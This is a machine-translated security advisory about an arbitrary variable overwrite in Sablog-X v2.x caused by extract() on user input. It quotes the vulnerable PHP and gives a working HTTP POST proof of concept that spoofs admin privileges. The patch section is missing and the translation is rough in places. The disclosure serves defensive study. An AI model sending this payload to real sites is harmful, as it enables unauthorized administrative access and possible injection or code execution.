Sablog-X v2. x is an arbitrary variable overwrite vulnerability-vulnerability warning-the black bar safety net

2010-02-19T00:00:00
ID MYHACK58:62201026206
Type myhack58
Reporter 佚名
Modified 2010-02-19T00:00:00

Description

author: 80vul-B team:http://www. 80vul. com

A description of Syria: the

Due to the Sablog-x v2. x common. inc. php in the$_EVO the initialization process there is a logical vulnerability, leading to can use extract()to overwrite any of the variables, eventually leading toxss, sql injection, code execution, and many other serious security vulnerabilities.

The second analysis

common. inc. php code:

|

1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3

|

.... $onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals'); if ($onoff != 1) { @extract($_COOKIE, EXTR_SKIP); @extract($_POST, EXTR_SKIP); @extract($_GET, EXTR_SKIP); } ... $sax_auth_key = md5($onlineip.$ _SERVER['HTTP_USER_AGENT']); list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array(", ", "); $sax_hash = sax_addslashes($_COOKIE['sax_hash']); ... $seccode = $sessionexists = 0; if ($sax_hash) { ... if ($_EVO = $DB->fetch_array($query)){ //$_EVO the initialization process in the if ($sax_hash), if the if condition is not satisfied, it will skip the initialization process. ... } if(!$ sessionexists) { if($sax_uid) { if(! ($_EVO = $DB->fetch_one_array("SELECT $userfields FROM {$db_prefix}users u WHERE u. userid='$sax_uid' AND u. password='$sax_pw' AND u. lastip='$onlineip'"))) { ... @extract($_EVO); //override any variables

---|---

From the above code snippet can see that,as long as the$sax_hash and$sax_uid the Boolean value is fales,$_EVO will not be assigned a value,and the$sax_hash and$sax_uid these two variables from the$_COOKIE,so that we can easily control$_EVO,then, by extract()to overwrite any of the variables,this will lead toxss, sql inj, code execution, etc. many serious security vulnerabilities:)

Three use

The following gives a background of Privilege spoofing PoC:

1 2 3 4 5 6 7 8 9 1 0 1 1

|

POST http://127.0.0.1/sax/cp.php HTTP/1.1 Accept: / Accept-Language: zh-cn Referer: http://127.0.0.1/sax/cp.php Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) Host: 127.0.0.1 Content-Length: 1 3 8 Connection: Close

_EVO[sax_uid]=1&_EVO[sax_pw]=1&_EVO[sax_logincount]=1&_EVO[sax_hash]=1&_EVO[sax_group]=1&_EVO[sax_auth_key]=1&_EVO[timestamp]=1 1 1 1 1 1 1 1 1 1 1 1

---|---

Four patch[fix]

Missing